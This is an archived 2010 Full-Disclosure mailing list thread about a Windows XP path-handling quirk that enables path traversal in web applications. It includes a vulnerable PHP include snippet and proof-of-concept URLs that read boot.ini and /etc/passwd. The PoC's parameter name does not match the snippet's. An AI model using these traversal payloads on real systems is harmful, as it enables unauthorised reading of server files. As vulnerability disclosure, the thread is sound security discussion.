lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [<thread-prev] [thread-next>] [day] [month] [year] [list] 
Date: Thu, 8 Jul 2010 12:37:06 +0100
From: Juan Galiana <jgaliana@...il.com>
To: Vipul Agarwal <vipul@...tygeeks.com>
Cc: full-disclosure@...ts.grok.org.uk
Subject: Re: Windows XP bug

This "feature" is useful to exploit path traversal in windows
environments through web applications.

In this case (I saw it plenty of times):

<?php require_once("help/help_".$_GET['lang'] .".php"); ?>


You can exploit it in windows with this PoC:

http://server/file.php?a=/../../../../../../boot.ini%00


because help/help_/../../../../../../boot.ini exists for windows and
the non-existing help_ directory is not breaking the instruction.


Otherwise, in linux is not possible to perform this kind of attacks
due we can't reference non-existing directories

$ ls -l noexist/../
ls: cannot access noexist/../: No such file or directory


An attack like http://server/file.php?a=/../../../../../../etc/passwd%00
won't work

Good approach!

Best Regards,

On Thu, Jul 8, 2010 at 10:13 AM, Vipul Agarwal <vipul@...tygeeks.com> wrote:
> First, the bug seems to be useless but you deployed it cleverly in the
> PoC. It could be something rare but makes web apps on Windows
> vulnerable with some exceptions.
>
> Nice work!
>
> On Thu, Jul 8, 2010 at 1:08 PM, Sagar Belure <sagar.belure@...il.com> wrote:
>> On Wed, Jul 7, 2010 at 10:54 AM, BlackHawk <hawkgotyou@...il.com> wrote:
>>> Hi list, i recently discovered a very small Windows XP bug, kind of
>>> useless alone but that could be usefull in some scenarios.
>>>
>>> Explanation:
>>>
>>> when you try to access a non existing directory though shell command
>>> "cd", XP returns an error (obviously), but if you cd to a non-existing
>>> & move one directory up, you'll not get any error.
>>>
>>> Example:
>>> ---
>>> C:\>cd ./somerandomchars <-- Will give an error
>>> Impossibile trovare il percorso specificato.
>>>
>>> C:\>cd ./somerandomchars/../ <-- Everything is ok
>>>
>>> C:\>
>>> ---
>>>
>>> PoC on how to make this thing usefull:
>>> http://www.scribd.com/doc/28080332/Podcast-Generator-1-3-Arbitrary-File-Download-Windows
>>>
>>> Hope this could be useful for you in some way..
>>>
>>> --
>>> BlackHawk - hawkgotyou@...il.com
>>>
>>> Sent with Gmail
>>>
>>> _______________________________________________
>>> Full-Disclosure - We believe in it.
>>> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>>> Hosted and sponsored by Secunia - http://secunia.com/
>>>
>>
>> Never seen this before.
>> But, it's very obvious, as you are 'changing directory'(cd
>> thisdoesntexist/) to a non existing folder and then getting out of
>> it(../).
>>
>> But, there is difference with evaluation/calculation in windows and linux.
>> Here is how...
>>
>> On Windows Box...
>>
>> C:\>cd thisdoesntexist/
>> The system cannot find the path specified.
>>
>> C:\>cd thisdoesntexist/../
>>
>> C:\>cd thisdoesntexist/thisonetoo/../
>> The system cannot find the path specified.
>>
>> C:\>cd thisdoesntexist/thisonetoo/../../
>>
>> C:\>
>>
>>
>> On Linux box...
>>
>> one@...ntubox:~$ cd thisdoesntexist/
>> -bash: cd: thisdoesntexist: No such file or directory
>> one@...ntubox:~$ cd thisdoesntexist/../
>> -bash: cd: thisdoesntexist/../: No such file or directory
>> one@...ntubox:~$
>>
>>
>> --
>> Thanks,
>> Sagar Belure
>> Security Analyst
>> Secfence Technologies
>> www.secfence.com
>>
>> _______________________________________________
>> Full-Disclosure - We believe in it.
>> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>> Hosted and sponsored by Secunia - http://secunia.com/
>>
>
>
>
> --
> Thanks and Regards,
> Vipul Agarwal
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ